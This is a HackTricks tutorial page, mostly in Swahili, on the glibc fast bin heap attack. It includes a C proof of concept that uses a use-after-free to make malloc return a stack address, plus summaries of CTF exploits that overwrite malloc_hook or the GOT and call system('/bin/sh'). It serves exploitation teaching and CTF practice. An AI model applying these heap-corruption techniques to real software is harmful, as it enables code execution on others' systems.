hacktricks/binary-exploitation/heap/fast-bin-attack.md

Shambulio la Fast Bin

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
• Pata bidhaa rasmi za PEASS & HackTricks
• Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa Msingi

Kwa habari zaidi kuhusu ni nini fast bin, tafadhali angalia ukurasa huu:

{% content-ref url="bins-and-memory-allocations.md" %} bins-and-memory-allocations.md {% endcontent-ref %}

Kwa kuwa fast bin ni kiungo cha moja kwa moja, kuna kinga chache sana kuliko katika mabakuli mengine na kubadilisha anwani katika kipande cha fast bin kilichofutwa ni ya kutosha kuweza kuweka kipande baadaye katika anwani yoyote ya kumbukumbu.

Kwa muhtasari:

{% code overflow="wrap" %}

ptr0 = malloc(0x20);
ptr1 = malloc(0x20);

// Put them in fast bin (suppose tcache is full)
free(ptr0)
free(ptr1)

// Use-after-free
// Modify the address where the free chunk of ptr1 is pointing
*ptr1 = (unsigned long)((char *)&<address>);

ptr2 = malloc(0x20); // This will get ptr1
ptr3 = malloc(0x20); // This will get a chunk in the <address> which could be abuse to overwrite arbitrary content inside of it

{% endcode %}

Unaweza kupata mfano kamili katika namna iliyoelezwa vizuri kwenye msimbo kutoka https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
puts("Today we will be discussing a fastbin attack.");
puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");

puts("Let's start, we will allocate three chunks of size 0x30\n");
unsigned long *ptr0, *ptr1, *ptr2;

ptr0 = malloc(0x30);
ptr1 = malloc(0x30);
ptr2 = malloc(0x30);

printf("Chunk 0: %p\n", ptr0);
printf("Chunk 1: %p\n", ptr1);
printf("Chunk 2: %p\n\n", ptr2);


printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");

int stackVar = 0x55;

printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);

printf("Proceeding that I'm going to write just some data to the three heap chunks\n");

char *data0 = "00000000";
char *data1 = "11111111";
char *data2 = "22222222";

memcpy(ptr0, data0, 0x8);
memcpy(ptr1, data1, 0x8);
memcpy(ptr2, data2, 0x8);

printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");

printf("Chunk 0: %s\n", (char *)ptr0);
printf("Chunk 1: %s\n", (char *)ptr1);
printf("Chunk 2: %s\n\n", (char *)ptr2);

printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");

free(ptr0);
free(ptr1);
free(ptr2);

printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);

printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");


printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");

*ptr1 = (unsigned long)((char *)&stackVar);

printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);


printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");

unsigned long *ptr3, *ptr4, *ptr5;

ptr3 = malloc(0x30);
ptr4 = malloc(0x30);
ptr5 = malloc(0x30);

printf("Chunk 3: %p\n", ptr3);
printf("Chunk 4: %p\n", ptr4);
printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);

printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
}

{% hint style="danger" %} Ikiwa niwezekana kubadilisha thamani ya kigezo cha kimataifa global_max_fast na nambari kubwa, hii inaruhusu kuzalisha fast bin za ukubwa mkubwa, ikiruhusu kufanya mashambulizi ya fast bin katika hali ambapo hapakuwa na uwezekano hapo awali. {% endhint %}

Mifano

• CTF https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html:
• Inawezekana kutenga vipande, kuvifuta, kusoma maudhui yao na kuvijaza (kwa udhaifu wa kujaa).
• Consolidate chunk for infoleak: Mbinu hii ni kimsingi kutumia udhaifu wa kujaa ili kuunda ukubwa wa awali wa uwongo ili kipande kilichopita kiwekwe ndani ya kikubwa zaidi, hivyo wakati wa kutenga kikubwa zaidi kinachohusisha kipande kingine, inawezekana kuchapisha data yake na kuvuja anwani ya libc (main_arena+88).
• Overwrite malloc hook: Kwa hili, na kutumia hali ya kufunika iliyopita, ilikuwa inawezekana kuwa na vipande 2 vilivyokuwa vikionyesha kwa kumbukumbu ile ile. Kwa hiyo, kuvifuta vyote viwili (kwa kufuta kipande kingine kati yake kuepuka ulinzi) ilikuwa inawezekana kuwa na kipande kile kile katika fast bin mara 2. Kisha, ilikuwa inawezekana kutenga tena, kubadilisha anwani ya kipande kinachofuata ili ielekee kidogo kabla ya malloc_hook (hivyo inaelekeza kwa nambari ambayo malloc inafikiria ni ukubwa wa bure - kuepuka nyingine), kutenga tena na kisha kutenga kipande kingine ambacho kitapokea anwani ya vifaa vya malloc. Hatimaye one gadget iliandikwa humo.
• CTF https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html:
• Kuna kujaa kwa kumbukumbu na mtumiaji baada ya kufuta na kufuta mara mbili kwa sababu wakati kipande kinapofutwa inawezekana kutumia upya na kufuta tena pointi
• Libc info leak: Tuache vipande vichache na vitapata pointi kwa sehemu ya eneo la main arena. Kwa kuwa unaweza kutumia upya pointi zilizofutwa, soma anwani hii.
• Fast bin attack: Pointi zote kwa kutenga zimehifadhiwa ndani ya safu, hivyo tunaweza kufuta vipande vichache vya fast bin na katika cha mwisho kubadilisha anwani ili ielekee kidogo kabla ya safu hii ya pointi. Kisha, kutenga vipande vichache na ukubwa sawa na tutapata kwanza halali na kisha bandia inayohusisha safu ya pointi. Sasa tunaweza kubadilisha pointi hizi za kutenga ili zielekee anwani ya free ili ielekee mfumo na kisha andika kipande 1 "/bin/sh" kisha free(chunk1) ambayo itatekeleza system("/bin/sh").
• CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html
• Mfano mwingine wa kutumia kujaa kwa 1B kufanya vipande kuwa imara katika unsorted bin na kupata libc infoleak na kisha kufanya mashambulizi ya fast bin kubadilisha malloc hook na anwani ya one gadget
• CTF https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html
• Baada ya kuvuja kwa habari kutumia unsorted bin na UAF kufichua anwani ya libc na anwani ya PIE, shambulio la CTF hili lilifanya mashambulizi ya fast bin kutenga kipande mahali ambapo pointi za vipande vilivyodhibitiwa vilikuwa hivyo ilikuwa inawezekana kubadilisha pointi fulani ili kuandika one gadget katika GOT
• Unaweza kupata Fast Bin attack iliyotumiwa kupitia shambulizi la unsorted bin:
• Kumbuka kwamba ni kawaida kabla ya kufanya mashambulizi ya fast bin kutumia orodha isiyopendelewa kufichua anwani za libc/heap (inapohitajika).

{% content-ref url="unsorted-bin-attack.md" %} unsorted-bin-attack.md {% endcontent-ref %}

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
• Pata bidhaa rasmi za PEASS & HackTricks
• Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.